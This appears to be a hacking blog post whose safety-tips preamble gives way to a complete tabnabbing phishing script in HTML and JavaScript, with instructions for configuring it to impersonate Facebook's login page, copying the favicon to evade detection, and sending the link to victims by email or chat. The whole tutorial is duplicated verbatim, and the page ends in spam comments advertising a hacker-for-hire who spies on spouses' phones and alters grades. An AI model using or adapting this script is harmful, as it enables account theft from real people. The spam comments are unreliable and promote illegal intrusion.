1. Always use anti-java script plugin's in your web browser that stops
execution of malicious javascripts. For example: Noscript for Firefox
etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.
First sample code for doing tabnabbing with the help of the code given below.
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (admin@innocenthacker.in)
Website: http://www.innocenthacker.in
Version:1.6
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.innocenthacker.in"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "InnocentHacker| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.innocenthacker.in/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE; //Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links;
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).
That's all for today. I hope you all enjoyed some advanced stuff.
Enjoy..!!
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.
First sample code for doing tabnabbing with the help of the code given below.
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (admin@innocenthacker.in)
Website: http://www.innocenthacker.in
Version:1.6
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.innocenthacker.in"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "InnocentHacker| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.innocenthacker.in/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE; //Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links;
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).
That's all for today. I hope you all enjoyed some advanced stuff.
Enjoy..!!
I want to use this opportunity to thank cybergoldenhacker professional service for a job well done ,I don't know its possible to spy on my partners phone remotely. If you need to check your spouse phone remotely without touching it contact : cybergoldenhacker at gmail dot com
ReplyDeleteIf you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest
ReplyDeleteEmail: cybergoldenhacker at gmail dot com
ReplyDeleteAre you willing to know who your spouse really is, if your spouse is cheating just contact cybergoldenhacker he is good at hacking into cell phones,changing school grades and many more this great hacker has also worked for me and i got results of spouse whats-app messages,call logs, text messages, viber,kik, Facebook, emails. deleted text messages and many more this hacker is very fast cheap and affordable he has never disappointed me for once contact him if you have any form of hacking problem am sure he will help you THANK YOU.
contact: cybergoldenhacker at gmail dot com